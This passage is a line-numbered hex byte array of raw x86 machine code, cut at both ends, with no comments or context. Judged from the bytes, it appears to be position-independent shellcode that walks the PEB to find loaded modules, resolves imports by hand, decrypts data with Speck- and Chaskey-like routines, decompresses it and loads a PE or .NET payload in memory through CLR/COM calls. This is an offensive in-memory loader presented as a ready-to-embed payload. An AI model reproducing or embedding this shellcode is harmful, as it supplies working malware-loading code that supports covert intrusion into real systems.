542 0xd0, 0x0f, 0x83, 0xfe, 0x02, 0x00, 0x00, 0x83, 0xc1, 0x02, 0x8b, 0x45,
543 0x04, 0x03, 0xc5, 0x89, 0x4c, 0x24, 0x1c, 0x3b, 0xc8, 0x75, 0xa8, 0x83,
544 0x39, 0x00, 0x8b, 0xe9, 0x75, 0x9c, 0x8b, 0x87, 0x80, 0x00, 0x00, 0x00,
545 0x85, 0xc0, 0x0f, 0x84, 0xa5, 0x00, 0x00, 0x00, 0x8d, 0x2c, 0x30, 0x8b,
546 0x45, 0x0c, 0x89, 0x6c, 0x24, 0x10, 0x85, 0xc0, 0x0f, 0x84, 0x93, 0x00,
547 0x00, 0x00, 0x8b, 0xbc, 0x24, 0x3c, 0x02, 0x00, 0x00, 0x03, 0xc6, 0x50,
548 0xff, 0x53, 0x30, 0x8b, 0x55, 0x10, 0x89, 0x44, 0x24, 0x1c, 0x03, 0xd6,
549 0x8b, 0x45, 0x00, 0x03, 0xc6, 0x89, 0x54, 0x24, 0x14, 0x89, 0x44, 0x24,
550 0x18, 0x8b, 0x08, 0x85, 0xc9, 0x74, 0x54, 0x8b, 0xea, 0x79, 0x05, 0x0f,
551 0xb7, 0xc1, 0xeb, 0x28, 0x8d, 0x46, 0x02, 0x03, 0xc1, 0x83, 0x7f, 0x04,
552 0x00, 0x89, 0x44, 0x24, 0x14, 0x74, 0x19, 0x50, 0x53, 0xe8, 0xa8, 0xf4,
553 0xff, 0xff, 0x59, 0x59, 0x85, 0xc0, 0x74, 0x08, 0x8b, 0x83, 0xd8, 0x00,
554 0x00, 0x00, 0xeb, 0x0c, 0x8b, 0x44, 0x24, 0x14, 0x50, 0xff, 0x74, 0x24,
555 0x20, 0xff, 0x53, 0x34, 0x89, 0x45, 0x00, 0x83, 0xc5, 0x04, 0x8b, 0x44,
556 0x24, 0x18, 0x83, 0xc0, 0x04, 0x89, 0x44, 0x24, 0x18, 0x8b, 0x08, 0x85,
557 0xc9, 0x75, 0xb2, 0x8b, 0x6c, 0x24, 0x10, 0x8b, 0x45, 0x20, 0x83, 0xc5,
558 0x14, 0x89, 0x6c, 0x24, 0x10, 0x85, 0xc0, 0x0f, 0x85, 0x78, 0xff, 0xff,
559 0xff, 0x8b, 0x7c, 0x24, 0x20, 0x8b, 0x87, 0xe0, 0x00, 0x00, 0x00, 0x85,
560 0xc0, 0x74, 0x77, 0x8d, 0x6e, 0x04, 0x03, 0xe8, 0x89, 0x6c, 0x24, 0x1c,
561 0x8b, 0x45, 0x00, 0x85, 0xc0, 0x74, 0x67, 0x03, 0xc6, 0x50, 0xff, 0x53,
562 0x30, 0x89, 0x44, 0x24, 0x10, 0x85, 0xc0, 0x74, 0x47, 0x8b, 0x4d, 0x0c,
563 0x8b, 0x55, 0x08, 0x03, 0xce, 0x03, 0xd6, 0x89, 0x4c, 0x24, 0x14, 0x89,
564 0x54, 0x24, 0x18, 0x8b, 0x01, 0x85, 0xc0, 0x74, 0x2f, 0x8b, 0xf9, 0x8b,
565 0xea, 0x8b, 0x4b, 0x34, 0x85, 0xc0, 0x79, 0x05, 0x0f, 0xb7, 0xc0, 0xeb,
566 0x05, 0x83, 0xc0, 0x02, 0x03, 0xc6, 0x50, 0xff, 0x74, 0x24, 0x14, 0xff,
567 0xd1, 0x83, 0xc7, 0x04, 0x89, 0x45, 0x00, 0x83, 0xc5, 0x04, 0x8b, 0x07,
568 0x85, 0xc0, 0x75, 0xd9, 0x8b, 0x6c, 0x24, 0x1c, 0x83, 0xc5, 0x20, 0x89,
569 0x6c, 0x24, 0x1c, 0x8b, 0x45, 0x00, 0x85, 0xc0, 0x75, 0x9d, 0x8b, 0x7c,
570 0x24, 0x20, 0x8b, 0xaf, 0xc0, 0x00, 0x00, 0x00, 0x85, 0xed, 0x74, 0x1b,
571 0x8b, 0x6c, 0x2e, 0x0c, 0x85, 0xed, 0x74, 0x13, 0xeb, 0x0a, 0x6a, 0x00,
572 0x6a, 0x01, 0x56, 0xff, 0xd0, 0x8d, 0x6d, 0x04, 0x8b, 0x45, 0x00, 0x85,
573 0xc0, 0x75, 0xef, 0x8b, 0x84, 0x24, 0x3c, 0x02, 0x00, 0x00, 0x8b, 0x6f,
574 0x28, 0x03, 0xee, 0x83, 0x38, 0x03, 0x0f, 0x85, 0x0b, 0x01, 0x00, 0x00,
575 0x6a, 0x00, 0x6a, 0x01, 0xff, 0x74, 0x24, 0x34, 0xff, 0xd5, 0x8b, 0x94,
576 0x24, 0x3c, 0x02, 0x00, 0x00, 0x81, 0xc2, 0x0c, 0x03, 0x00, 0x00, 0x89,
577 0x54, 0x24, 0x2c, 0x80, 0x3a, 0x00, 0x0f, 0x84, 0x55, 0x01, 0x00, 0x00,
578 0x8b, 0x4f, 0x78, 0x85, 0xc9, 0x0f, 0x84, 0x4a, 0x01, 0x00, 0x00, 0x8b,
579 0x6c, 0x31, 0x18, 0x85, 0xed, 0x0f, 0x84, 0x3e, 0x01, 0x00, 0x00, 0x8b,
580 0x44, 0x31, 0x1c, 0x03, 0xc6, 0x89, 0x44, 0x24, 0x10, 0x8b, 0x44, 0x31,
581 0x20, 0x8b, 0x4c, 0x31, 0x24, 0x03, 0xc6, 0x03, 0xce, 0x89, 0x4c, 0x24,
582 0x14, 0x8d, 0x04, 0xa8, 0x83, 0xc0, 0xfc, 0x89, 0x44, 0x24, 0x20, 0x8b,
583 0x00, 0x03, 0xc6, 0x52, 0x50, 0xe8, 0x4d, 0x0a, 0x00, 0x00, 0x59, 0x59,
584 0x85, 0xc0, 0x74, 0x16, 0x8b, 0x44, 0x24, 0x20, 0x83, 0xe8, 0x04, 0x89,
585 0x44, 0x24, 0x20, 0x83, 0xed, 0x01, 0x74, 0x1c, 0x8b, 0x54, 0x24, 0x2c,
586 0xeb, 0xd9, 0x8b, 0x44, 0x24, 0x14, 0x8b, 0x4c, 0x24, 0x10, 0x0f, 0xb7,
587 0x44, 0x68, 0xfe, 0x8b, 0x04, 0x81, 0x03, 0xc6, 0x89, 0x44, 0x24, 0x24,
588 0xff, 0x77, 0x54, 0x6a, 0x00, 0x56, 0xe8, 0xfb, 0x09, 0x00, 0x00, 0xff,
589 0x77, 0x54, 0x6a, 0x00, 0xff, 0x74, 0x24, 0x3c, 0xe8, 0xed, 0x09, 0x00,
590 0x00, 0x8b, 0x44, 0x24, 0x3c, 0x83, 0xc4, 0x18, 0x85, 0xc0, 0x0f, 0x84,
591 0xb5, 0x00, 0x00, 0x00, 0x8b, 0xac, 0x24, 0x3c, 0x02, 0x00, 0x00, 0x8d,
592 0xbd, 0x0c, 0x04, 0x00, 0x00, 0x80, 0x3f, 0x00, 0x74, 0x31, 0x8b, 0x8d,
593 0x0c, 0x05, 0x00, 0x00, 0x85, 0xc9, 0x74, 0x15, 0x8d, 0x44, 0x24, 0x30,
594 0x50, 0x57, 0x53, 0xe8, 0x0a, 0x05, 0x00, 0x00, 0x8b, 0x8d, 0x0c, 0x05,
595 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x85, 0xc9, 0x8d, 0x44, 0x24, 0x30, 0x0f,
596 0x44, 0xc7, 0x50, 0x8b, 0x44, 0x24, 0x28, 0xff, 0xd0, 0xeb, 0x72, 0xff,
597 0xd0, 0xeb, 0x6e, 0x05, 0x0c, 0x04, 0x00, 0x00, 0x80, 0x38, 0x00, 0x74,
598 0x1a, 0x8d, 0x4c, 0x24, 0x30, 0x51, 0x50, 0x53, 0xe8, 0xd5, 0x04, 0x00,
599 0x00, 0x8d, 0x44, 0x24, 0x3c, 0x50, 0x53, 0xe8, 0x26, 0x02, 0x00, 0x00,
600 0x83, 0xc4, 0x14, 0xff, 0x77, 0x54, 0x6a, 0x00, 0x56, 0xe8, 0x68, 0x09,
601 0x00, 0x00, 0xff, 0x77, 0x54, 0x6a, 0x00, 0xff, 0x74, 0x24, 0x3c, 0xe8,
602 0x5a, 0x09, 0x00, 0x00, 0x8b, 0x84, 0x24, 0x54, 0x02, 0x00, 0x00, 0x33,
603 0xc9, 0x83, 0xc4, 0x18, 0x39, 0x48, 0x04, 0x74, 0x15, 0x51, 0x51, 0x51,
604 0x55, 0x51, 0x51, 0xff, 0x53, 0x5c, 0x85, 0xc0, 0x74, 0x13, 0x6a, 0xff,
605 0x50, 0xff, 0x53, 0x58, 0xeb, 0x0b, 0x64, 0xa1, 0x18, 0x00, 0x00, 0x00,
606 0xff, 0x70, 0x30, 0xff, 0xd5, 0x68, 0x00, 0xc0, 0x00, 0x00, 0x6a, 0x00,
607 0x56, 0xff, 0x53, 0x40, 0x5e, 0x5f, 0x5d, 0x5b, 0x81, 0xc4, 0x24, 0x02,
608 0x00, 0x00, 0xc3, 0x81, 0xec, 0xf4, 0x02, 0x00, 0x00, 0x53, 0x8b, 0x9c,
609 0x24, 0xfc, 0x02, 0x00, 0x00, 0x55, 0x56, 0x6a, 0x04, 0x8b, 0x83, 0x18,
610 0x09, 0x00, 0x00, 0x33, 0xf6, 0x68, 0x00, 0x30, 0x00, 0x00, 0x8d, 0x04,
611 0x45, 0x02, 0x00, 0x00, 0x00, 0x50, 0x56, 0xff, 0x53, 0x3c, 0x8b, 0xe8,
612 0x85, 0xed, 0x0f, 0x84, 0x84, 0x01, 0x00, 0x00, 0x8b, 0x84, 0x24, 0x08,
613 0x03, 0x00, 0x00, 0x8b, 0x88, 0x24, 0x05, 0x00, 0x00, 0x05, 0x28, 0x05,
614 0x00, 0x00, 0x03, 0xc9, 0x51, 0x55, 0x6a, 0xff, 0x50, 0x56, 0x56, 0xff,
615 0x53, 0x50, 0x8d, 0x44, 0x24, 0x58, 0x89, 0x44, 0x24, 0x14, 0x8d, 0x44,
616 0x24, 0x14, 0x50, 0x53, 0xe8, 0x9f, 0xe5, 0xff, 0xff, 0x8d, 0x44, 0x24,
617 0x4c, 0x89, 0x44, 0x24, 0x24, 0x8d, 0x44, 0x24, 0x24, 0x50, 0x53, 0xe8,
618 0x42, 0xe4, 0xff, 0xff, 0x8d, 0x84, 0x24, 0x94, 0x00, 0x00, 0x00, 0x89,
619 0x44, 0x24, 0x38, 0x8d, 0x44, 0x24, 0x38, 0x50, 0x53, 0xe8, 0x3d, 0xee,
620 0xff, 0xff, 0x83, 0xc4, 0x18, 0x56, 0x56, 0xff, 0x93, 0xbc, 0x00, 0x00,
621 0x00, 0x85, 0xc0, 0x0f, 0x85, 0xf5, 0x00, 0x00, 0x00, 0x8d, 0x44, 0x24,
622 0x0c, 0x50, 0x8d, 0x83, 0x94, 0x06, 0x00, 0x00, 0x50, 0x6a, 0x03, 0x56,
623 0x8d, 0x83, 0x74, 0x06, 0x00, 0x00, 0x50, 0xff, 0x93, 0xc0, 0x00, 0x00,
624 0x00, 0x85, 0xc0, 0x0f, 0x85, 0xd1, 0x00, 0x00, 0x00, 0x8b, 0x4c, 0x24,
625 0x0c, 0x8d, 0x44, 0x24, 0x10, 0x50, 0x8d, 0x83, 0xc4, 0x06, 0x00, 0x00,
626 0x50, 0x8b, 0x11, 0x51, 0xff, 0x12, 0x85, 0xc0, 0x0f, 0x85, 0xa0, 0x00,
627 0x00, 0x00, 0x8b, 0x44, 0x24, 0x10, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x0c,
628 0x85, 0xc0, 0x0f, 0x85, 0x84, 0x00, 0x00, 0x00, 0x8b, 0x4c, 0x24, 0x0c,
629 0x8d, 0x54, 0x24, 0x14, 0x89, 0x4c, 0x24, 0x34, 0x52, 0x51, 0x8b, 0x01,
630 0xff, 0x50, 0x0c, 0x85, 0xc0, 0x75, 0x6d, 0x57, 0x8d, 0x84, 0x24, 0x00,
631 0x01, 0x00, 0x00, 0x50, 0x8d, 0x83, 0xe0, 0x05, 0x00, 0x00, 0x50, 0x53,
632 0xe8, 0x45, 0x03, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x84, 0x24, 0x00,
633 0x01, 0x00, 0x00, 0x50, 0xff, 0x93, 0x84, 0x00, 0x00, 0x00, 0x8b, 0x4c,
634 0x24, 0x10, 0x8b, 0xf8, 0x6a, 0x02, 0x57, 0x51, 0x8b, 0x11, 0xff, 0x52,
635 0x20, 0x57, 0x8b, 0xf0, 0xff, 0x93, 0x88, 0x00, 0x00, 0x00, 0x5f, 0x85,
636 0xf6, 0x75, 0x27, 0x8b, 0x44, 0x24, 0x10, 0x33, 0xf6, 0x56, 0x56, 0x56,
637 0x8b, 0x08, 0x56, 0x56, 0x56, 0x56, 0x56, 0x55, 0x50, 0xff, 0x51, 0x14,
638 0x85, 0xc0, 0x75, 0x10, 0x8b, 0x44, 0x24, 0x0c, 0x6a, 0x02, 0x50, 0x8b,
639 0x08, 0xff, 0x51, 0x14, 0xeb, 0x02, 0x33, 0xf6, 0x8b, 0x44, 0x24, 0x10,
640 0x50, 0x8b, 0x08, 0xff, 0x51, 0x08, 0x8b, 0x44, 0x24, 0x0c, 0x50, 0x8b,
641 0x08, 0xff, 0x51, 0x1c, 0x8b, 0x44, 0x24, 0x0c, 0x50, 0x8b, 0x08, 0xff,
642 0x51, 0x08, 0x8b, 0x83, 0x18, 0x09, 0x00, 0x00, 0x8d, 0x04, 0x45, 0x02,
643 0x00, 0x00, 0x00, 0x50, 0x56, 0x55, 0xe8, 0x67, 0x07, 0x00, 0x00, 0x83,
644 0xc4, 0x0c, 0x68, 0x00, 0xc0, 0x00, 0x00, 0x56, 0x55, 0xff, 0x53, 0x40,
645 0x5e, 0x5d, 0x5b, 0x81, 0xc4, 0xf4, 0x02, 0x00, 0x00, 0xc3, 0x81, 0xec,
646 0x9c, 0x00, 0x00, 0x00, 0x64, 0xa1, 0x18, 0x00, 0x00, 0x00, 0x53, 0x55,
647 0x56, 0x8b, 0x40, 0x30, 0x57, 0x8b, 0xbc, 0x24, 0xb0, 0x00, 0x00, 0x00,
648 0x89, 0x44, 0x24, 0x14, 0x8b, 0x40, 0x10, 0x89, 0x44, 0x24, 0x18, 0x8d,
649 0x87, 0x4c, 0x03, 0x00, 0x00, 0x50, 0xff, 0x57, 0x38, 0x8b, 0xd8, 0x33,
650 0xc0, 0x8b, 0x53, 0x3c, 0x03, 0xd3, 0x0f, 0xb7, 0x6a, 0x14, 0x03, 0xea,
651 0x0f, 0xb7, 0x52, 0x06, 0x8d, 0x4d, 0x18, 0x85, 0xd2, 0x74, 0x12, 0x8b,
652 0xb7, 0x44, 0x03, 0x00, 0x00, 0x39, 0x31, 0x74, 0x6e, 0x40, 0x83, 0xc1,
653 0x28, 0x3b, 0xc2, 0x72, 0xf4, 0x8b, 0x5c, 0x24, 0x1c, 0x8b, 0x74, 0x24,
654 0x1c, 0x83, 0x64, 0x24, 0x10, 0x00, 0x85, 0xdb, 0x74, 0x48, 0x8b, 0xee,
655 0xc7, 0x44, 0x24, 0x28, 0x01, 0x00, 0x00, 0x00, 0x89, 0x6c, 0x24, 0x1c,
656 0xff, 0x75, 0x04, 0x57, 0xe8, 0x2e, 0xf0, 0xff, 0xff, 0x59, 0x59, 0x85,
657 0xc0, 0x74, 0x17, 0x8b, 0x44, 0x24, 0x18, 0x33, 0xc9, 0x41, 0x83, 0xc0,
658 0x40, 0x51, 0x55, 0x50, 0xff, 0x97, 0xc8, 0x00, 0x00, 0x00, 0x85, 0xc0,
659 0x75, 0x33, 0x8b, 0x44, 0x24, 0x10, 0x83, 0xc5, 0x04, 0x40, 0x89, 0x6c,
660 0x24, 0x1c, 0x89, 0x44, 0x24, 0x10, 0x3b, 0xc3, 0x72, 0xc6, 0x33, 0xc0,
661 0x5f, 0x5e, 0x5d, 0x5b, 0x81, 0xc4, 0x9c, 0x00, 0x00, 0x00, 0xc3, 0x6b,
662 0xc0, 0x28, 0x8b, 0x74, 0x28, 0x24, 0x03, 0xf3, 0x8b, 0x5c, 0x28, 0x20,
663 0xc1, 0xeb, 0x02, 0xeb, 0x90, 0x33, 0xc0, 0x40, 0x50, 0x8b, 0x44, 0x24,
664 0x1c, 0x83, 0xc0, 0x40, 0x50, 0x8d, 0x44, 0x24, 0x28, 0x50, 0xff, 0x97,
665 0xd0, 0x00, 0x00, 0x00, 0xff, 0xb4, 0x24, 0xb4, 0x00, 0x00, 0x00, 0x55,
666 0xff, 0x97, 0xe0, 0x00, 0x00, 0x00, 0x83, 0x64, 0x24, 0x10, 0x00, 0xff,
667 0x76, 0x04, 0x57, 0xe8, 0xab, 0xef, 0xff, 0xff, 0x59, 0x59, 0x85, 0xc0,
668 0x74, 0x14, 0x33, 0xc0, 0x40, 0x50, 0x56, 0x8d, 0x44, 0x24, 0x28, 0x50,
669 0xff, 0x97, 0xcc, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x75, 0x12, 0x8b, 0x44,
670 0x24, 0x10, 0x83, 0xc6, 0x04, 0x40, 0x89, 0x44, 0x24, 0x10, 0x3b, 0xc3,
671 0x72, 0xcd, 0xeb, 0x20, 0x33, 0xc0, 0x40, 0x50, 0x55, 0x8d, 0x44, 0x24,
672 0x28, 0x50, 0xff, 0x97, 0xd0, 0x00, 0x00, 0x00, 0x6a, 0x08, 0x8d, 0x44,
673 0x24, 0x24, 0x50, 0x56, 0xe8, 0xdd, 0x05, 0x00, 0x00, 0x83, 0xc4, 0x0c,
674 0x8b, 0x44, 0x24, 0x14, 0x8b, 0x40, 0x0c, 0x8b, 0x58, 0x0c, 0x83, 0x7b,
675 0x18, 0x00, 0x0f, 0x84, 0x14, 0x01, 0x00, 0x00, 0x8d, 0x87, 0x6c, 0x03,
676 0x00, 0x00, 0x8b, 0xc8, 0x89, 0x44, 0x24, 0x14, 0x8a, 0x11, 0x33, 0xc0,
677 0x40, 0x33, 0xf6, 0x89, 0x44, 0x24, 0x18, 0x33, 0xc0, 0x84, 0xd2, 0x0f,
678 0x84, 0xe1, 0x00, 0x00, 0x00, 0x8d, 0x7c, 0x24, 0x2c, 0x8b, 0xe9, 0x2b,
679 0xf9, 0x89, 0x7c, 0x24, 0x10, 0x8b, 0x7c, 0x24, 0x18, 0x8b, 0x4c, 0x24,
680 0x10, 0x89, 0x7c, 0x24, 0x10, 0x80, 0xfa, 0x3b, 0x74, 0x29, 0x3d, 0x80,
681 0x00, 0x00, 0x00, 0x73, 0x22, 0x33, 0xff, 0x88, 0x14, 0x29, 0x80, 0xfa,
682 0x77, 0x0f, 0x45, 0x7c, 0x24, 0x10, 0x80, 0xfa, 0x70, 0x89, 0x7c, 0x24,
683 0x18, 0x0f, 0x44, 0x74, 0x24, 0x28, 0x40, 0x45, 0x8a, 0x55, 0x00, 0x84,
684 0xd2, 0x75, 0xce, 0x8b, 0xbc, 0x24, 0xb0, 0x00, 0x00, 0x00, 0x8b, 0x6c,
685 0x24, 0x1c, 0x8b, 0x4c, 0x24, 0x14, 0x89, 0x74, 0x24, 0x10, 0x85, 0xc0,
686 0x0f, 0x84, 0x80, 0x00, 0x00, 0x00, 0x41, 0xc6, 0x44, 0x04, 0x2c, 0x00,
687 0x03, 0xc8, 0x8d, 0x44, 0x24, 0x2c, 0x50, 0xff, 0x73, 0x18, 0x89, 0x4c,
688 0x24, 0x1c, 0xff, 0x57, 0x34, 0x8b, 0x4c, 0x24, 0x14, 0x8b, 0xf0, 0x85,
689 0xf6, 0x0f, 0x84, 0x65, 0xff, 0xff, 0xff, 0x83, 0x7c, 0x24, 0x18, 0x00,
690 0x74, 0x26, 0x83, 0x7c, 0x24, 0x10, 0x00, 0x74, 0x04, 0xff, 0xd6, 0x8b,
691 0xf0, 0x8b, 0x4c, 0x24, 0x14, 0x85, 0xf6, 0x0f, 0x84, 0x47, 0xff, 0xff,
692 0xff, 0x83, 0x3e, 0x00, 0x0f, 0x84, 0x3e, 0xff, 0xff, 0xff, 0x8b, 0x44,
693 0x24, 0x24, 0xeb, 0x23, 0x83, 0x7c, 0x24, 0x10, 0x00, 0x74, 0x04, 0xff,
694 0xd6, 0x8b, 0xf0, 0x8b, 0x4c, 0x24, 0x14, 0x85, 0xf6, 0x0f, 0x84, 0x21,
695 0xff, 0xff, 0xff, 0x83, 0x3e, 0x00, 0x0f, 0x84, 0x18, 0xff, 0xff, 0xff,
696 0x8b, 0x45, 0x04, 0x8b, 0x4c, 0x24, 0x14, 0x89, 0x06, 0xe9, 0x0a, 0xff,
697 0xff, 0xff, 0x8b, 0x1b, 0x8d, 0x87, 0x6c, 0x03, 0x00, 0x00, 0x83, 0x7b,
698 0x18, 0x00, 0x0f, 0x85, 0xf2, 0xfe, 0xff, 0xff, 0x33, 0xc0, 0x40, 0xe9,
699 0x34, 0xfe, 0xff, 0xff, 0x8b, 0x44, 0x24, 0x0c, 0xc7, 0x00, 0x01, 0x00,
700 0x00, 0x00, 0x33, 0xc0, 0xc2, 0x10, 0x00, 0x8b, 0x44, 0x24, 0x04, 0x2b,
701 0x44, 0x24, 0x08, 0xc3, 0x8b, 0x44, 0x24, 0x04, 0x99, 0xf7, 0x7c, 0x24,
702 0x08, 0xc3, 0x8b, 0x44, 0x24, 0x04, 0x68, 0x00, 0x01, 0x00, 0x00, 0xff,
703 0x74, 0x24, 0x10, 0x6a, 0xff, 0xff, 0x74, 0x24, 0x14, 0x6a, 0x00, 0x6a,
704 0x00, 0xff, 0x50, 0x50, 0xc3, 0xe8, 0x00, 0x00, 0x00, 0x00, 0x58, 0x83,
705 0xe8, 0x05, 0xc3, 0x55, 0x8b, 0xec, 0x64, 0xa1, 0x18, 0x00, 0x00, 0x00,
706 0x33, 0xc9, 0x56, 0x8b, 0x40, 0x30, 0x8b, 0x40, 0x0c, 0x8b, 0x70, 0x0c,
707 0xeb, 0x20, 0x85, 0xc9, 0x75, 0x23, 0xff, 0x75, 0x18, 0xff, 0x75, 0x14,
708 0xff, 0x75, 0x10, 0xff, 0x75, 0x0c, 0x50, 0xff, 0x75, 0x08, 0xe8, 0x25,
709 0xe7, 0xff, 0xff, 0x8b, 0x36, 0x83, 0xc4, 0x18, 0x8b, 0xc8, 0x8b, 0x46,
710 0x18, 0x85, 0xc0, 0x75, 0xd9, 0x8b, 0xc1, 0x5e, 0x5d, 0xc3, 0x83, 0xec,
711 0x14, 0x53, 0x8b, 0x5c, 0x24, 0x20, 0x33, 0xc0, 0x55, 0x8b, 0x6c, 0x24,
712 0x28, 0x56, 0x57, 0x33, 0xff, 0x89, 0x44, 0x24, 0x2c, 0x33, 0xf6, 0x89,
713 0x74, 0x24, 0x10, 0x8b, 0x4c, 0x24, 0x28, 0x8a, 0x0c, 0x08, 0x84, 0xc9,
714 0x74, 0x11, 0x83, 0xf8, 0x40, 0x74, 0x0c, 0x88, 0x4c, 0x3c, 0x14, 0x47,
715 0x40, 0x89, 0x44, 0x24, 0x2c, 0xeb, 0x57, 0x6a, 0x10, 0x58, 0x2b, 0xc7,
716 0x8d, 0x74, 0x24, 0x14, 0x50, 0x03, 0xf7, 0x6a, 0x00, 0x56, 0xe8, 0xf7,
717 0x03, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0xc6, 0x06, 0x80, 0x83, 0xff, 0x0c,
718 0x72, 0x21, 0x55, 0x8d, 0x44, 0x24, 0x18, 0x53, 0x50, 0xe8, 0x5e, 0x00,
719 0x00, 0x00, 0x6a, 0x10, 0x33, 0xd8, 0x33, 0xea, 0x8d, 0x44, 0x24, 0x24,
720 0x6a, 0x00, 0x50, 0xe8, 0xce, 0x03, 0x00, 0x00, 0x83, 0xc4, 0x18, 0x8b,
721 0x44, 0x24, 0x2c, 0x8b, 0x74, 0x24, 0x10, 0xc1, 0xe0, 0x03, 0x46, 0x6a,
722 0x10, 0x89, 0x44, 0x24, 0x24, 0x5f, 0x89, 0x74, 0x24, 0x10, 0x83, 0xff,
723 0x10, 0x75, 0x15, 0x55, 0x8d, 0x44, 0x24, 0x18, 0x53, 0x50, 0xe8, 0x21,
724 0x00, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x33, 0xd8, 0x33, 0xea, 0x33, 0xff,
725 0x8b, 0x44, 0x24, 0x2c, 0x85, 0xf6, 0x0f, 0x84, 0x67, 0xff, 0xff, 0xff,
726 0x5f, 0x5e, 0x8b, 0xd5, 0x8b, 0xc3, 0x5d, 0x5b, 0x83, 0xc4, 0x14, 0xc3,
727 0x83, 0xec, 0x10, 0x8b, 0x44, 0x24, 0x18, 0x8b, 0x54, 0x24, 0x1c, 0x53,
728 0x55, 0x56, 0x8b, 0x74, 0x24, 0x20, 0x33, 0xdb, 0x57, 0x8d, 0x7c, 0x24,
729 0x10, 0xa5, 0xa5, 0xa5, 0xa5, 0x8b, 0x4c, 0x24, 0x14, 0x8b, 0x74, 0x24,
730 0x1c, 0x8b, 0x6c, 0x24, 0x18, 0x8b, 0x7c, 0x24, 0x10, 0x89, 0x4c, 0x24,
731 0x28, 0x8b, 0xce, 0xc1, 0xc8, 0x08, 0x8b, 0x74, 0x24, 0x28, 0x03, 0xc2,
732 0xc1, 0xce, 0x08, 0x33, 0xc7, 0x03, 0xf7, 0xc1, 0xc2, 0x03, 0x33, 0xf3,
733 0xc1, 0xc7, 0x03, 0x33, 0xd0, 0x89, 0x6c, 0x24, 0x28, 0x33, 0xfe, 0x8b,
734 0xe9, 0x43, 0x83, 0xfb, 0x1b, 0x72, 0xd6, 0x5f, 0x5e, 0x5d, 0x5b, 0x83,
735 0xc4, 0x10, 0xc3, 0x8b, 0x54, 0x24, 0x10, 0x83, 0xec, 0x14, 0x53, 0x8b,
736 0x5c, 0x24, 0x24, 0x85, 0xd2, 0x0f, 0x84, 0xe8, 0x00, 0x00, 0x00, 0x8b,
737 0x44, 0x24, 0x20, 0x55, 0x33, 0xed, 0x45, 0x56, 0x8d, 0x48, 0x0f, 0x2b,
738 0xe8, 0x57, 0x89, 0x4c, 0x24, 0x10, 0x89, 0x6c, 0x24, 0x34, 0x8b, 0xf0,
739 0x8d, 0x7c, 0x24, 0x14, 0x33, 0xc9, 0xa5, 0xa5, 0xa5, 0xa5, 0x8b, 0x74,
740 0x24, 0x28, 0x8b, 0x04, 0x8e, 0x31, 0x44, 0x8c, 0x14, 0x41, 0x83, 0xf9,
741 0x04, 0x72, 0xf3, 0x8b, 0x74, 0x24, 0x20, 0x8b, 0x44, 0x24, 0x1c, 0x8b,
742 0x7c, 0x24, 0x18, 0x8b, 0x4c, 0x24, 0x14, 0xc7, 0x44, 0x24, 0x30, 0x10,
743 0x00, 0x00, 0x00, 0x03, 0xcf, 0x03, 0xc6, 0xc1, 0xc7, 0x05, 0x33, 0xf9,
744 0xc1, 0xc6, 0x08, 0x33, 0xf0, 0xc1, 0xc1, 0x10, 0x03, 0xc7, 0x03, 0xce,
745 0xc1, 0xc7, 0x07, 0xc1, 0xc6, 0x0d, 0x33, 0xf8, 0x33, 0xf1, 0xc1, 0xc0,
746 0x10, 0x83, 0x6c, 0x24, 0x30, 0x01, 0x75, 0xd7, 0x8b, 0x6c, 0x24, 0x28,
747 0x89, 0x4c, 0x24, 0x14, 0x33, 0xc9, 0x89, 0x74, 0x24, 0x20, 0x89, 0x7c,
748 0x24, 0x18, 0x89, 0x44, 0x24, 0x1c, 0x8b, 0x44, 0x8d, 0x00, 0x31, 0x44,
749 0x8c, 0x14, 0x41, 0x83, 0xf9, 0x04, 0x72, 0xf2, 0x8b, 0x6c, 0x24, 0x34,
750 0x8b, 0xca, 0x6a, 0x10, 0x58, 0x3b, 0xd0, 0x0f, 0x47, 0xc8, 0x85, 0xc9,
751 0x74, 0x19, 0x8d, 0x7c, 0x24, 0x14, 0x8b, 0xf3, 0x2b, 0xfb, 0x8b, 0xe9,
752 0x8a, 0x04, 0x37, 0x30, 0x06, 0x46, 0x83, 0xed, 0x01, 0x75, 0xf5, 0x8b,
753 0x6c, 0x24, 0x34, 0x2b, 0xd1, 0x03, 0xd9, 0x8b, 0x4c, 0x24, 0x10, 0x80,
754 0x01, 0x01, 0x75, 0x08, 0x49, 0x8d, 0x04, 0x29, 0x85, 0xc0, 0x7f, 0xf3,
755 0x8b, 0x44, 0x24, 0x2c, 0x85, 0xd2, 0x0f, 0x85, 0x32, 0xff, 0xff, 0xff,
756 0x5f, 0x5e, 0x5d, 0x5b, 0x83, 0xc4, 0x14, 0xc3, 0x83, 0xec, 0x14, 0x8b,
757 0x4c, 0x24, 0x18, 0x83, 0x64, 0x24, 0x10, 0x00, 0x53, 0x55, 0x8b, 0x6c,
758 0x24, 0x24, 0x8a, 0x01, 0x56, 0x57, 0x88, 0x45, 0x00, 0x83, 0xcf, 0xff,
759 0x8d, 0x45, 0x01, 0x33, 0xf6, 0x89, 0x44, 0x24, 0x18, 0x33, 0xdb, 0x8d,
760 0x41, 0x01, 0x89, 0x5c, 0x24, 0x10, 0x89, 0x44, 0x24, 0x14, 0x8d, 0x44,
761 0x24, 0x14, 0x50, 0xe8, 0x67, 0x01, 0x00, 0x00, 0x59, 0x85, 0xc0, 0x0f,
762 0x84, 0x32, 0x01, 0x00, 0x00, 0x8d, 0x44, 0x24, 0x14, 0x50, 0xe8, 0x54,
763 0x01, 0x00, 0x00, 0x85, 0xc0, 0x8d, 0x44, 0x24, 0x18, 0x59, 0x50, 0x74,
764 0x7d, 0xe8, 0x45, 0x01, 0x00, 0x00, 0x59, 0x85, 0xc0, 0x74, 0x37, 0x6a,
765 0x04, 0x33, 0xf6, 0x5b, 0x8d, 0x44, 0x24, 0x14, 0x50, 0xe8, 0x31, 0x01,
766 0x00, 0x00, 0x59, 0x8d, 0x34, 0x70, 0x83, 0xeb, 0x01, 0x75, 0xed, 0x8b,
767 0x54, 0x24, 0x18, 0x85, 0xf6, 0x74, 0x0a, 0x8b, 0xc2, 0x2b, 0xc6, 0x8a,
768 0x00, 0x88, 0x02, 0xeb, 0x03, 0xc6, 0x02, 0x00, 0x8b, 0x5c, 0x24, 0x10,
